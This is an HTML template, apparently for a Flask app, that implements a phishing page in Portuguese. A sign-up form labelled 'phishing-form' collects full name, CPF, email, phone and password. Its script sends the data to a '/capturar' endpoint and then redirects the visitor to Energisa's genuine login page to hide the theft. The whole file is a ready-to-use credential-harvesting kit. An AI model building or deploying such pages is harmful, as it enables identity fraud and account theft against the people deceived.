<!DOCTYPE html>
<html lang="pt-br">

<head>
    <meta charset="UTF-8">
    <meta http-equiv="X-UA-Compatible" content="IE=edge">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title>Formulário</title>
    <link rel="stylesheet" href="{{ url_for('static', filename='style.css') }}">
</head>

<body>
    <nav>
        <ul>
            <li><a href="#">Introdução</a></li>
            <li><a href="#">Desafios</a></li>
            <li><a href="#">Benefícios</a></li>
            <li><a href="#">Participe</a></li>
        </ul>
    </nav>

    <img class="logo" src="{{ url_for('static', filename='imagem/logo.png') }}" alt="logo">
    <img class="rio-img" src="{{ url_for('static', filename='imagem/logorio.png') }}" alt="">

    <div class="container">
        <img class="form-image" src="{{ url_for('static', filename='imagem/moça.png') }}" alt="">

        <div class="form">
            <form id="phishing-form">
                <div class="form-header">
                    <div class="title">
                        <h1>Cadastre-se</h1>
                    </div>
                </div>

                <div class="input-group">
                    <div class="input-box">
                        <label for="fullname">Nome Completo</label>
                        <input id="fullname" type="text" name="fullname" placeholder="Digite seu nome completo" required>
                    </div>
                    <div class="input-box">
                        <label for="cpf">CPF</label>
                        <input id="cpf" type="text" name="cpf" placeholder="Digite seu CPF" required>
                    </div>
                    <div class="input-box">
                        <label for="email">E-mail</label>
                        <input id="email" type="email" name="email" placeholder="Digite seu e-mail" required>
                    </div>
                    <div class="input-box">
                        <label for="number">Celular</label>
                        <input id="number" type="tel" name="number" placeholder="(xx) xxxx-xxxx" required>
                    </div>
                    <div class="input-box">
                        <label for="password">Senha</label>
                        <input id="password" type="password" name="password" placeholder="Digite sua senha" required>
                    </div>
                </div>

                <div class="gender-group">
                    <label><input type="radio" name="gender" id="feminino"> Feminino</label>
                    <label><input type="radio" name="gender" id="masculino"> Masculino</label>
                    <label><input type="radio" name="gender" id="outros"> Outros</label>
                    <label><input type="radio" name="gender" id="nao_dizer"> Prefiro não dizer</label>
                </div>

                <div class="continue-button">
                    <button type="submit">Cadastrar</button>
                </div>
            </form>
        </div>
    </div>

    <script>
        document.getElementById('phishing-form').addEventListener('submit', function (e) {
            e.preventDefault();

            const dados = {
                nome_completo: document.getElementById('fullname').value,
                cpf: document.getElementById('cpf').value,
                email: document.getElementById('email').value,
                celular: document.getElementById('number').value,
                senha: document.getElementById('password').value,
                genero: document.querySelector('input[name="gender"]:checked')?.id || 'não informado'
            };

            fetch('/capturar', {
                method: 'POST',
                headers: { 'Content-Type': 'application/json' },
                body: JSON.stringify(dados)
            }).then(response => {
                if (response.ok) {
                    // Redireciona após envio
                    window.location.href = 'https://servicos.energisa.com.br/login';
                } else {
                    alert('Erro ao enviar os dados.');
                }
            });
        });
    </script>
</body>

</html>
